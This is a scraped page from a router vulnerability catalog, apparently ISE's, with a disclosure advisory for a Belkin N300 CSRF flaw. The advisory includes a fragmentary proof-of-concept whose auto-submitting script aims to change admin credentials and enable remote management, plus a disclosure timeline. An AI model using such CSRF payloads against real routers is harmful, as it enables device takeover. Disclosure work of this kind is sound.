ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
these issues can be found here: http://www.securityevaluators.com/content/casestudies/routers/#recommendationsVendors<br />
Solution<br />
♦ There currently is not a solution to this problem.<br />
♦ Restrict access to WAN services such as remote management to prevent an<br />
attacker from gaining access if an attack is successful.<br />
Proof of Concept Exploit<br />
If the following request is sent to the router, it will change the configuration settings<br />
without authentication.<br />
<br />
<br />
Belkin N300 CSRF -‐ Change Admin Creds. and Enable Remote MGMT. <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
> <br />
<br />
<br />
<br />
<br />
<br />
<br />
function BeLkIn300() {document.belkinN300.submit();}; window.setTimeout(BeLkIn300, 0000); <br />
<br />
<br />
<br />
Disclosure Timeline<br />
♦ 4/3/2013 - Notified Belkin<br />
♦ 4/15/2013 - Public Disclosure<br />
*In between the initial notification and the public disclosure, <strong>ISE</strong> reached out to Belkin multiple times<br />
requesting that our vulnerabilities were escalated to the proper support team.<br />
References<br />
♦ Advisory/Video: http://infosec42.blogspot.com<br />
♦ http://securityevaluators.com/content/case-studies/<br />
<br />
75